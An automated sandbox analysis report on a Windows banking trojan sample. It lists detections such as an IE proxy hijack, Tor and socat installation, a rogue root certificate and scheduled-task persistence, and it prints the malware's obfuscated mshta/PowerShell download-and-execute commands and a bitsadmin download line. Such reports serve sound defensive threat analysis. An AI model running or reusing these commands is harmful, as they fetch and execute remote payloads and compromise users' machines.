
Analysis Report

Overview

General Information

Joe Sandbox Version: 20.0.0
Analysis ID: 446656
Start time: 12:33:14
Joe Sandbox Product: Cloud
Start date: 27.11.2017
Overall analysis duration: 0h 13m 18s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: bbtsvbq.exe
Cookbook file name: default.jbs
Analysis system description: Windows 7 with additional language packs (German, French, Swedish, Norwegian), Java 1.8.0_40, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 62, Firefox 36
Number of analysed new started processes: 40
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies
  • HCA enabled
  • EGA enabled
  • HDC enabled
Detection: MAL
Classification: mal100.evad.expl.spyw.bank.troj.winEXE@57/102@11/16
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 71
  • Number of non-executed functions: 92
EGA Information:
  • Successful, ratio: 75%
HDC Information:
  • Successful, ratio: 100% (good quality ratio 96%)
  • Quality average: 84.6%
  • Quality standard deviation: 25.9%
Cookbook Comments:
  • Found application associated with file extension: .exe
Warnings:
  • Exclude process from analysis (whitelisted): conhost.exe, dllhost.exe
  • Execution Graph export aborted for target mshta.exe, PID 2692 because there are no executed functions
  • Report creation exceeded maximum time and may have missing disassembly code information.
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing network information.
  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
  • Report size getting too big, too many NtDeviceIoControlFile calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtSetInformationFile calls found.
  • Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: powershell.exe


Detection

Strategy: Threshold
Score: 100
Range: 0 - 100
Reporting: Report FP / FN
Detection: malicious


Confidence

Strategy: Threshold
Score: 5
Range: 0 - 5
Further Analysis Required?: false


Analysis Advice

  • Sample drops PE files which have not been started, submit dropped PE samples for a secondary analysis to Joe Sandbox
  • Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis



Signature Overview



AV Detection:

Antivirus detection for submitted file
Source: bbtsvbq.exe | virustotal: Detection: 60%

Cryptography:

Public key (encryption) found
Source: tor.exe | Binary or memory string: -----BEGIN RSA PUBLIC KEY-----

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Creates a window with clipboard capturing capabilities
Source: C:\Windows\System32\mshta.exe | Window created: window name: CLIPBRDWNDCLASS

E-Banking Fraud:

Sets an auto configuration URL for Internet Explorer (IE settings are enforced automatically)
Source: C:\Users\user\Desktop\bbtsvbq.exe | Registry key created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Internet Settings AutoConfigURL http://127.0.0.1:5555/mmlhKC7c.js?ip=62.210.13.58

Networking:

Contains functionality to download additional files from the internet
Source: C:\ProgramData\VitBTKxRu\OZEImhRAzl\socat.exe | Code function: 19_2_0040C6C3 recv,__errno,__errno,19_2_0040C6C3
Downloads files from webservers via HTTP
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1; Accept: */*; Accept-Encoding: gzip, deflate; User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E); Host: api.ipify.org; Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1; Host: api.ipify.org; Connection: Keep-Alive
Found strings which match to known social media urls
Source: powershell.exe | String found in binary or memory: login.yahoo.com equals www.yahoo.com (Yahoo)
Source: powershell.exe | String found in binary or memory: login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: powershell.exe | String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Performs DNS lookups
Source: unknown | DNS traffic detected: queries for: api.nuget.org
Urls found in memory or binary data
Uses HTTPS
Connects to several IPs in different countries
Source: unknown | Network traffic detected: IP country count 10
HTTP GET or POST without a user agent
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1; Host: api.ipify.org; Connection: Keep-Alive
Uses a known web browser user agent for HTTP communication
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1; Accept: */*; Accept-Encoding: gzip, deflate; User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E); Host: api.ipify.org; Connection: Keep-Alive
Detected TCP or UDP traffic on non-standard ports
Source: global traffic | TCP traffic: 192.168.1.91:49172 -> 31.171.155.108:9001
Source: global traffic | TCP traffic: 192.168.1.91:49180 -> 212.47.234.212:9001
Source: global traffic | TCP traffic: 192.168.1.91:49182 -> 208.80.154.39:9002
Source: global traffic | TCP traffic: 192.168.1.91:49183 -> 54.36.205.38:9001
Installs TOR (Internet Anonymizer)
Source: C:\ProgramData\7za.exe | File created: C:\ProgramData\VitBTKxRu\Tor\tor.exe
May check the online IP address of the machine
Source: unknown | DNS query: name: api.ipify.org

Boot Survival:

Installs Task Scheduler Managed Wrapper
Source: C:\ProgramData\7za.exe | File created: C:\Users\user~1\AppData\Local\Temp\2HVmGbfK7qLuRZ\lib\net20\Microsoft.Win32.TaskScheduler.dll
Source: C:\ProgramData\7za.exe | File created: C:\Users\user~1\AppData\Local\Temp\2HVmGbfK7qLuRZ\lib\net35\Microsoft.Win32.TaskScheduler.dll
Source: C:\ProgramData\7za.exe | File created: C:\Users\user~1\AppData\Local\Temp\2HVmGbfK7qLuRZ\lib\net40\Microsoft.Win32.TaskScheduler.dll
Source: C:\ProgramData\7za.exe | File created: C:\Users\user~1\AppData\Local\Temp\2HVmGbfK7qLuRZ\lib\net452\Microsoft.Win32.TaskScheduler.dll

Remote Access Functionality:

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\ProgramData\VitBTKxRu\OZEImhRAzl\socat.exe | Code function: 19_2_0040C103 bind,__errno,__errno,19_2_0040C103
Source: C:\ProgramData\VitBTKxRu\OZEImhRAzl\socat.exe | Code function: 19_2_0040C24D listen,__errno,__errno,19_2_0040C24D
Source: C:\ProgramData\VitBTKxRu\OZEImhRAzl\socat.exe | Code function: 19_1_0040C103 bind,__errno,__errno,19_1_0040C103
Source: C:\ProgramData\VitBTKxRu\OZEImhRAzl\socat.exe | Code function: 19_1_0040C24D listen,__errno,__errno,19_1_0040C24D

Persistence and Installation Behavior:

Installs Cygwin
Source: C:\ProgramData\7za.exe | File created: C:\ProgramData\VitBTKxRu\socat-windows-1.7.2.1\cygwin1.dll
Drops PE files
Source: C:\ProgramData\7za.exe | File created: C:\Users\user~1\AppData\Local\Temp\2HVmGbfK7qLuRZ\lib\net20\es\Microsoft.Win32.TaskScheduler.resources.dll
Source: C:\ProgramData\7za.exe | File created: C:\Users\user~1\AppData\Local\Temp\2HVmGbfK7qLuRZ\lib\net40\it\Microsoft.Win32.TaskScheduler.resources.dll
Source: C:\ProgramData\7za.exe | File created: C:\Users\user~1\AppData\Local\Temp\2HVmGbfK7qLuRZ\lib\net40\fr\Microsoft.Win32.TaskScheduler.resources.dll
Source: C:\ProgramData\7za.exe | File created: C:\Users\user~1\AppData\Local\Temp\2HVmGbfK7qLuRZ\lib\net452\zh-CN\Microsoft.Win32.TaskScheduler.resources.dll
Source: C:\ProgramData\7za.exe | File created: C:\Users\user~1\AppData\Local\Temp\2HVmGbfK7qLuRZ\lib\net452\de\Microsoft.Win32.TaskScheduler.resources.dll
Source: C:\ProgramData\7za.exe | File created: C:\Users\user~1\AppData\Local\Temp\2HVmGbfK7qLuRZ\lib\net40\de\Microsoft.Win32.TaskScheduler.resources.dll
Source: C:\ProgramData\7za.exe | File created: C:\ProgramData\VitBTKxRu\socat-windows-1.7.2.1\cygwrap-0.dll
Source: C:\ProgramData\7za.exe | File created: C:\Users\user~1\AppData\Local\Temp\2HVmGbfK7qLuRZ\lib\net20\de\Microsoft.Win32.TaskScheduler.resources.dll
Source: C:\ProgramData\7za.exe | File created: C:\Users\user~1\AppData\Local\Temp\2HVmGbfK7qLuRZ\lib\net452\es\Microsoft.Win32.TaskScheduler.resources.dll
Source: C:\ProgramData\7za.exe | File created: C:\Users\user~1\AppData\Local\Temp\2HVmGbfK7qLuRZ\lib\net35\zh-CN\Microsoft.Win32.TaskScheduler.resources.dll
Source: C:\ProgramData\7za.exe | File created: C:\Users\user~1\AppData\Local\Temp\2HVmGbfK7qLuRZ\lib\net20\it\Microsoft.Win32.TaskScheduler.resources.dll
Source: C:\ProgramData\7za.exe | File created: C:\Users\user~1\AppData\Local\Temp\2HVmGbfK7qLuRZ\lib\net35\it\Microsoft.Win32.TaskScheduler.resources.dll
Source: C:\ProgramData\7za.exe | File created: C:\Users\user~1\AppData\Local\Temp\2HVmGbfK7qLuRZ\lib\net35\fr\Microsoft.Win32.TaskScheduler.resources.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\ProgramData\7za.exe
Source: C:\ProgramData\7za.exe | File created: C:\Users\user~1\AppData\Local\Temp\2HVmGbfK7qLuRZ\lib\net40\zh-CN\Microsoft.Win32.TaskScheduler.resources.dll
Source: C:\ProgramData\7za.exe | File created: C:\Users\user~1\AppData\Local\Temp\2HVmGbfK7qLuRZ\lib\net20\fr\Microsoft.Win32.TaskScheduler.resources.dll
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | File created: C:\Users\user\AppData\Local\Temp\9kehql3e.dll
Source: C:\ProgramData\7za.exe | File created: C:\Users\user~1\AppData\Local\Temp\2HVmGbfK7qLuRZ\lib\net452\it\Microsoft.Win32.TaskScheduler.resources.dll
Source: C:\ProgramData\7za.exe | File created: C:\Users\user~1\AppData\Local\Temp\2HVmGbfK7qLuRZ\lib\net35\es\Microsoft.Win32.TaskScheduler.resources.dll
Source: C:\ProgramData\7za.exe | File created: C:\Users\user~1\AppData\Local\Temp\2HVmGbfK7qLuRZ\lib\net452\fr\Microsoft.Win32.TaskScheduler.resources.dll
Source: C:\ProgramData\7za.exe | File created: C:\Users\user~1\AppData\Local\Temp\2HVmGbfK7qLuRZ\lib\net35\de\Microsoft.Win32.TaskScheduler.resources.dll
Source: C:\ProgramData\7za.exe | File created: C:\Users\user~1\AppData\Local\Temp\2HVmGbfK7qLuRZ\lib\net40\es\Microsoft.Win32.TaskScheduler.resources.dll
Source: C:\ProgramData\7za.exe | File created: C:\Users\user~1\AppData\Local\Temp\2HVmGbfK7qLuRZ\lib\net20\zh-CN\Microsoft.Win32.TaskScheduler.resources.dll
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\ProgramData\7za.exe | File created: C:\ProgramData\VitBTKxRu\socat-windows-1.7.2.1\cygwrap-0.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\ProgramData\7za.exe
Installs new ROOT certificates
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Tries to download and execute files (via powershell)
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' '$F=$env:Temp+'\\xeAcHBDS.exe';rm -Force $F;$cl=(New-Object Net.WebClient);$cl.DownloadFile('http://127.0.0.1:5555/0dTRgfA.asp?ts&ip='+$cl.DownloadString('http://api.ipify.org/'),$F);& $F'
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' '$F=$env:Temp+'\\xeAcHBDS.exe';rm -Force $F;$cl=(New-Object Net.WebClient);$cl.DownloadFile('http://127.0.0.1:5555/0dTRgfA.asp?ts&ip='+$cl.DownloadString('http://api.ipify.org/'),$F);& $F'
Tries to download files via bitsadmin
Source: unknown | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\system32\cmd.exe' /b /c bitsadmin /transfer /download /priority HIGH 'https://torproject.urown.net/dist/torbrowser/7.0.8/tor-win32-0.3.1.7.zip' 'C:\Users\user~1\AppData\Local\Temp\8LtgeHPulp.zip'
Source: unknown | Process created: C:\Windows\System32\bitsadmin.exe bitsadmin /transfer /download /priority HIGH 'https://torproject.urown.net/dist/torbrowser/7.0.8/tor-win32-0.3.1.7.zip' 'C:\Users\user~1\AppData\Local\Temp\8LtgeHPulp.zip'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\system32\cmd.exe' /b /c bitsadmin /transfer /download /priority HIGH 'https://torproject.urown.net/dist/torbrowser/7.0.8/tor-win32-0.3.1.7.zip' 'C:\Users\user~1\AppData\Local\Temp\8LtgeHPulp.zip'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bitsadmin.exe bitsadmin /transfer /download /priority HIGH 'https://torproject.urown.net/dist/torbrowser/7.0.8/tor-win32-0.3.1.7.zip' 'C:\Users\user~1\AppData\Local\Temp\8LtgeHPulp.zip'

Data Obfuscation:

Compiles C# or VB.Net code
Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\9kehql3e.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\9kehql3e.cmdline'
Contains functionality to dynamically determine API calls
Source: C:\ProgramData\7za.exe | Code function: 6_2_00471C24 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,6_2_00471C24
PE file contains sections with non-standard names
Source: 7za.exe.4.dr | Static PE information: section name: .sxdata
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\bbtsvbq.exe | Code function: 1_2_013BC366 push ecx; ret 1_2_013BC379
Source: C:\Users\user\Desktop\bbtsvbq.exe | Code function: 1_2_013B2036 push ecx; ret 1_2_013B2049
Source: C:\ProgramData\7za.exe | Code function: 6_2_0046B890 push eax; ret 6_2_0046B8AE
Source: C:\ProgramData\7za.exe | Code function: 6_2_00459590 push ecx; mov dword ptr [esp], ecx 6_2_00459591
Source: C:\ProgramData\7za.exe | Code function: 6_2_0046CC80 push eax; ret 6_2_0046CCAE
Source: C:\Windows\System32\mshta.exe | Code function: 17_1_02805518 push eax; ret 17_1_02805548
Source: C:\ProgramData\VitBTKxRu\OZEImhRAzl\socat.exe | Code function: 19_2_00425518 push eax; ret 19_2_00425548
Source: C:\ProgramData\VitBTKxRu\OZEImhRAzl\socat.exe | Code function: 19_1_00425518 push eax; ret 19_1_00425548
Obfuscated command line found
Source: unknown | Process created: C:\Windows\System32\mshta.exe mshta.exe vbscript:close(CreateObject('WScript.Shell').Run('powershell.exe ''$F=$env:Temp+'\\xeAcHBDS.exe';rm -Force $F;$cl=(New-Object Net.WebClient);$cl.DownloadFile('http://127.0.0.1:5555/0dTRgfA.asp?ts&ip='+$cl.Download'+'String('http://api.ipify.org/'),$F);& $F''',0,False))
Source: C:\Windows\System32\taskeng.exe | Process created: C:\Windows\System32\mshta.exe mshta.exe vbscript:close(CreateObject('WScript.Shell').Run('powershell.exe ''$F=$env:Temp+'\\xeAcHBDS.exe';rm -Force $F;$cl=(New-Object Net.WebClient);$cl.DownloadFile('http://127.0.0.1:5555/0dTRgfA.asp?ts&ip='+$cl.Download'+'String('http://api.ipify.org/'),$F);& $F''',0,False))
Powershell starts a process from the temp directory
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ep Unrestricted -f 'C:\Users\user~1\AppData\Local\Temp\3s7V1nHq.ps1'
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ep Unrestricted -f 'C:\Users\user~1\AppData\Local\Temp\3s7V1nHq.ps1'
Suspicious powershell command line found
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ep Unrestricted -f 'C:\ProgramData\C4CqRww6.ps1'
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ep Unrestricted -f 'C:\Users\user~1\AppData\Local\Temp\3s7V1nHq.ps1'
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ep Unrestricted -f 'C:\ProgramData\C4CqRww6.ps1'
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ep Unrestricted -f 'C:\Users\user~1\AppData\Local\Temp\3s7V1nHq.ps1'

Spreading:

Contains functionality to enumerate / list files inside a directory
Source: C:\Users\user\Desktop\bbtsvbq.exe | Code function: 1_2_013B6ECA FindFirstFileExA,1_2_013B6ECA
Source: C:\ProgramData\7za.exe | Code function: 6_2_0040B174 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,AreFileApisANSI,FindFirstFileA,6_2_0040B174
Source: C:\ProgramData\7za.exe | Code function: 6_2_0040B6E9 __EH_prolog,FindFirstFileW,GetCurrentDirectoryW,6_2_0040B6E9
Enumerates the file system
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming

System Summary:

Reads internet explorer settings
Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_USERS\Software\Microsoft\Internet Explorer\Settings
Found graphical window changes (likely an installer)
Source: Window Recorder | Window detected: More than 3 window changes detected
Uses Microsoft Silverlight
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
Uses new MSVCR Dlls
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\MSVCR80.dll
PE file contains a mix of data directories often seen in goodware
Source: bbtsvbq.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: bbtsvbq.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: bbtsvbq.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: bbtsvbq.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: bbtsvbq.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: bbtsvbq.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Contains modern PE file flags such as dynamic base (ASLR) or NX
Source: bbtsvbq.exe | Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
PE file contains a debug data directory
Source: bbtsvbq.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Binary contains paths to debug symbols
Source: Binary string: mscorlib.pdb source: powershell.exe
Source: Binary string: C:\Windows\mscorlib.pdb source: powershell.exe
Source: Binary string: mscorrc.pdb source: powershell.exe
Source: Binary string: rlib.pdb source: powershell.exe
Source: Binary string: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe
Source: Binary string: C:\Users\dahall\Documents\Visual Studio 2010\Projects\TaskService\obj\Release\Microsoft.Win32.TaskScheduler.pdbt source: Microsoft.Win32.TaskScheduler.dll2.6.dr
Source: Binary string: c:\Users\user\AppData\Local\Temp\9kehql3e.pdb source: 9kehql3e.dll.35.dr
Source: Binary string: msado15.pdb source: bbtsvbq.exe
Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe
Source: Binary string: C:\Windows\dll\mscorlib.pdb source: powershell.exe
Source: Binary string: indows\mscorlib.pdbpdblib.pdb source: powershell.exe
Source: Binary string: C:\Users\dahall\Documents\Visual Studio 2010\Projects\TaskService\obj\Release\Microsoft.Win32.TaskScheduler.pdb source: powershell.exe, Microsoft.Win32.TaskScheduler.dll.6.dr, Microsoft.Win32.TaskScheduler.dll2.6.dr, Microsoft.Win32.TaskScheduler.dll1.6.dr
Source: Binary string: System.Management.Automation.pdb source: powershell.exe
Source: Binary string: msado15.pdb`Cr source: bbtsvbq.exe
Source: Binary string: scrrun.pdb source: bbtsvbq.exe
PE file contains a valid data directory to section mapping
Source: bbtsvbq.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: bbtsvbq.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: bbtsvbq.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: bbtsvbq.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: bbtsvbq.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Classification label
Source: classification engine | Classification label: mal100.evad.expl.spyw.bank.troj.winEXE@57/102@11/16
Contains functionality to instantiate COM classes
Source: C:\Users\user\Desktop\bbtsvbq.exe | Code function: 1_2_013B1160 __EH_prolog3_GS,CoInitializeEx,CLSIDFromProgID,CoCreateInstance,1_2_013B1160
Creates files inside the user directory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations
Creates temporary files
Source: C:\Users\user\Desktop\bbtsvbq.exe | File created: C:\Users\user~1\AppData\Local\Temp\3s7V1nHq.ps1
Found command line output
Source: C:\Windows\System32\bitsadmin.exe | Console Write: ..........................0.....\...d...T.....................................%..d.wl.%....w.@......,.%.....8........;..
Source: C:\Windows\System32\bitsadmin.exe | Console Write: ..............0.....B.I.T.S.A.D.M.I.N. .v.e.r.s.i.o.n. .3...0. .[. .7...5...7.6.0.1. .].........X.I.8.%.H....;......8...
Source: C:\Windows\System32\bitsadmin.exe | Console Write: ..........0.........B.I.T.S. .a.d.m.i.n.i.s.t.r.a.t.i.o.n. .u.t.i.l.i.t.y....... .].........X.I.X.I.<.%.<............).w
Source: C:\Windows\System32\bitsadmin.exe | Console Write: ....................T.S. .a.d.m.i.n.i.s.t.r.a.t.i.o.n. .u.t.i.l.i.t.y....... .].........X.I.X.I.X.I.....R...............
Source: C:\Windows\System32\bitsadmin.exe | Console Write: ........................d.m.i.n.i.s.t.r.a.t.i.o.n. .u.t.i.l.i.t.y....... .].........X.I.X.I.X.I.....D.%...............%.
Source: C:\Windows\System32\bitsadmin.exe | Console Write: ....................d.m.i.n.i.s.t.r.a.t.i.o.n. .u.t.i.l.i.t.y....... .].........X.I.X.I.X.I.....X.I...................|.
Source: C:\Windows\System32\bitsadmin.exe | Console Write: ....................i.n.i.s.t.r.a.t.i.o.n. .u.t.i.l.i.t.y....... .].........X.I.X.I.X.I.....X.I.........................
Source: C:\Windows\System32\bitsadmin.exe | Console Write: ........................t.r.a.t.i.o.n. .u.t.i.l.i.t.y....... .].........X.I.X.I.X.I.....X.I.........P.%.................
Source: C:\Windows\System32\bitsadmin.exe | Console Write: ....................U.n.a.b.l.e. .t.o. .c.o.n.n.e.c.t. .t.o. .B.I.T.S. .-. .0.x.8.0.0.7.0.4.2.2.......%.P...`.....,.....
Source: C:\Windows\System32\bitsadmin.exe | Console Write: ..................................................................\w..........%...%.o.\w....H.%.#.\w........`.....,.....
Source: C:\Windows\System32\bitsadmin.exe | Console Write: ..................................................................\w..........%...%.o.\w....H.%.#.\w..%...........,.....
Source: C:\Windows\System32\bitsadmin.exe | Console Write: ..................................................................\w..........%...%.o.\w....H.%.#.\w..%.....`.....,.....
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ..........X...}.#........Wa..........Wa...X...1m.p9...1m.-...k9...X.........|g9. w1.|g9...}...*..B...........p9...9.....
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ..........X...*.#.....]w..X...............]w..0..................D..................#.........n.p.X...X.................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ..........X...*./...x.e.'. .b.e.c.a.u.s.e. .i.t. .d.o.e.s. .n.o.t. .e.x.i.s.t......./.........n.0.X...X.<...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ..........X...*./.....]w..X...............]w..0..................D................../.........n.p.X...X.................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ..........X...*.;...A.t. .l.i.n.e.:.1. .c.h.a.r.:.3.3............E..................;.........n.0.X...X."...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ..........X...*.;.....]w..X...............]w..0.................1E..................;.........n.p.X...X.................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ..........X...*.G.....]w..X...............]w..0.................\E..................G.........n.0.X.....................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ..........X...*.G.....]w..X...............]w..0.................zE..................G.........n.p.X...X.................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ..........X...*.S.....]w..X...............]w..0..................E..................S.........n.0.X.....................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ..........X...*.S.....]w..X...............]w..0..................E..................S.........n.p.X...X.................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ..........X...*._...n.g.(.'.h.t.t.p.:././.a.p.i...i.p.i.f.y...o.r.g./.'.).,.$.F.).;.&. .$.F...n.0.X...X.H...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ..........X...*._.....]w..X...............]w..0..................F.................._.........n.p.X...X.................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ..........X...*.k.....]w..X...............]w..0..................F..................k.........n.0.X.....................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ..........X...*.k.....]w..X...............]w..0.................LF..................k.........n.p.X...X.................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ..........X...*.w.....]w..X...............]w..0.................wF..................w.........n.0.X.....d...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ..........X...*.w.....]w..X...............]w..0..................F..................w.........n.p.X...X.................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ..........X...*.......]w..X...............]w..0..................F............................n.0.X.....................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ..........X...*.......]w..X...............]w..0..................F............................n.p.X...X.................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ..........X...*..... . . .e.I.t.e.m.C.o.m.m.a.n.d................G............................n.0.X...X.................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ..........X...*.......]w..X...............]w..0..................G............................n.p.X...X.................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ..........X...*..... .]w..X...............]w..0.................CG............................n.0.X...X.................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ..........X...*.......]w..X...............]w..0.................aG............................n.p.X...X.................
Source: C:\Windows\System32\taskkill.exe | Console Write: ..........]w..0.............................................(.,.....0.......e.......o...n.......B.......Z...............
Source: C:\Windows\System32\taskkill.exe | Console Write: ..........]w..0.....`...d...T...............................(.".............d.......]...n.......B.......X...............
Source: C:\Windows\System32\taskkill.exe | Console Write: ..........]w..0.....d...$.......]........................... .......P.......c.......[...n.......B.......V...............
PE file has an executable .text section and no other executable section
Source: bbtsvbq.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Parts of this application are using the .NET runtime (probably coded in C#)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9f895c66454577eff9c77442d0c84f71\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
